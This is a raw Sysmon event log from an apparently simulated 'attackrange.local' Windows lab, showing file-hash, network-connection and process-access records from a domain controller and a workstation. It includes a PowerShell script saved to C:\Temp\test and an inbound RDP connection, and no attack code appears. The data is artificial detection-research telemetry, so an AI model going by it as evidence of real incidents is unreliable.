23542300x8000000000000000809342Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:15.942{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3F10C2E85E34FEB6D69F6112E654B7D,SHA256=9A65584C353807E0F5A68E3A1415B211CE9AB1729F69FC895069728A0C30F161,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809341Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:14.341{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57392-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:15.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43EE3BD9AFB080C0EBED4634267DA8FF,SHA256=97A9845B9CF0AAC5F4514DABCD8C896A921E29008E1F925AF8D07F105DECB5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809343Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:16.943{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B0CC9CCD8355744910B58DAF40B24CE,SHA256=3A0E0D6B5CBB98DD21AF0192907B043CB08A167DD58E778795C412A02B9B6A14,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.341{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-59243-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001052584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.019{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51169-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001052583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.019{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51169-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x8000000000000000809344Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:17.989{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1221C0A4856983B3267AACFE4A3F2988,SHA256=118812F9E413D0793B6DD9410972A569A3A831112FCECBE77E63636D2C705BEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:08.703{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51170-false10.0.1.12-8000- 11241100x80000000000000001052588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.038{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps12021-07-12 07:48:31.886 23542300x80000000000000001052587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.038{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\test\sd2.ps1MD5=FD964C2C1008837F4729AA06C45A99AB,SHA256=A1DBBC8C3FB38A648CAB6C8866108F281CD55F0EBE6BA7A61CA83FEB6812F923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:17.006{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F862A88097FEA78E2B5323C7D6B890C,SHA256=5DE67BD18B82B62EE0AA29432CC090ACEF0B72B35AF46733AF5048C180552559,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:18.453{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:18.037{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F00EBA56BC396FFB21E00ED8AFF1E7,SHA256=316073532F5BF9F27FBC7E955CC276CB85C75E6FEB6538A7E8ECBD316CEBE08C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809345Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:19.005{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25AB61B987EF32913843D72E2D991032,SHA256=E85D50E9F893D1447CE7067C58504205FD459EE285040C983EF6F00BFCF47605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:19.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E801D07D10609F631E05DBAC4CEE3F4E,SHA256=243A775BD1198399968D22BD715A677A6A5242011091ED6AB1F7FBEDCDDE1F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.404{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CF89F8070627D3BFC18DE3EC3E7C736,SHA256=D4E46C5C457CD361FED8CB2EEA0CED36134B7587D253E858537865F00CD74E19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:20.067{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=263C5594171704DF6306D284AE9404C7,SHA256=F5007EED9185A5F8AF9976377336BB50EA6BAE6F820644E63A1D3CE1F7E2519E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809347Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.739{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809346Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.052{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFFA6396332C8A322F9B7D0105AC8918,SHA256=DA594A0D521E896DBAE67FEE076060CBD5FCDFA9356A6E3E42B49C89E4B7B166,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809349Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:21.067{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E336C4A8957484609640D2F28EFB34CB,SHA256=7A14C949FBAFF4D9FF6845336E020550F5699AE1FD48B9A5D2D898314A51B0D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809348Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:19.403{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57393-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001052595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:21.085{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A4F653C17DEED5C5C246B0D99264A02,SHA256=77A4D1C36E2CCEAC47A987D59C87A52C4042179966772B687A59A29F31115E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.565{466BC892-3152-60E8-240B-00000000CF01}3328ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\axpgvkas.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=FC080046FA09E60B15E86AE652C3559F,SHA256=69B43C18DEA1876A3BFB2F0F3FA507DC2E4B6FCA2CA994C354E4EEAD43F985F1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:14.569{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51171-false10.0.1.12-8000- 23542300x80000000000000001052607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.103{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84948F92CA9363B5F200AA55512CFDFF,SHA256=F96682ED8330993D7B682F35E34AA38C3F19B6394E02BC55ECF3B874DD2CB57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809351Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:22.239{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BB819A7158D19106D69BAC65DD13862,SHA256=F66FBF0FDE9B444C32F41AB27D01B43F4BA1CCCF39E6953ADF941FB1DEBA8BAE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809350Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:20.872{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57394-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x80000000000000001052606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.066{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=602358628677AB35777AB7E494D8A927,SHA256=AEBC2ECB402650747FA5112B5895DFF3C30C30FA0E04B09E5DED2F60B5815C41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.066{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=97CEBF3212B7865C6B1268402C8E1B96,SHA256=C0B730566A0BE3E303D5AD04582C9B569C558B7BCBB5BBFE508035121DDDE481,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2641E8A6CD059CDCA43738B80A55371A,SHA256=1A3865DCF2803F9A270482FB2FC786EED3DCF11EF7173063C99E6D66157FFE17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=837B3017FBD669A6D2E1B2826C1F2ABD,SHA256=ADE5AA5189596B5C97C7994C2533FF0158A13A223E37EA052F953F74A9FF2EF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B2C10654BF46A02F5CB1DDF21B6ED97D,SHA256=A27886467823E5C589AF9F4ACC89BA60CF6C7E71AF437736B731B000C71104A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=66CDA290967B2139C3154DD09B3F79D6,SHA256=BAFE2EE331C1167DA6B8DE605F572023F11922BE94276EEC0B50E0D3D9E8070C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=12E22F42906229E008E0BF34CDEF9C11,SHA256=B0994D8CEB3DE460C195456696686DA7543561E540D293AC5DD771A265C8128B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8EEDD46FC205CA50193F66CAEB6EEB81,SHA256=AB1AC79E030D9F3DC4EFD5544D4C00DA155AF5F63A2D05C89F593F345219A255,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A44F9EA55F02B16BD5F7003A202CC6E8,SHA256=1D9DFFC5770AA1E917E44D2FEDA49BC84AA2A48157E0165B2939C133FEFBB1AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C9A86F429096F0DB9E12E6A93A4CB4F4,SHA256=7E39EE2DEAC771944FD903CE988CACA8702EA2E55A58F19B277AF6CFBC160B82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:22.050{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A13FB066A8D139E305E7BDF801694497,SHA256=2258DAB001D8EEB0DA267BC383C23830E605D9B6B382B02F3B47824C78E0CC8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809352Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:23.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCEE8B4D1986C0BAD43EF6D5DFB21E68,SHA256=D6390831FA3B0FDC4078A8FD20A05CFE642E842F87C6774A17DAE5FB832F2CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:23.103{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B44A7933CB44B8EB0DC0E6C87772693C,SHA256=907FF1E32FC9CFE5F9281B6A7E91DB8A24364EF521321F87F442D88E64BAF04B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.552{0C1E0330-F710-60EB-B979-00000000D001}25321060C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 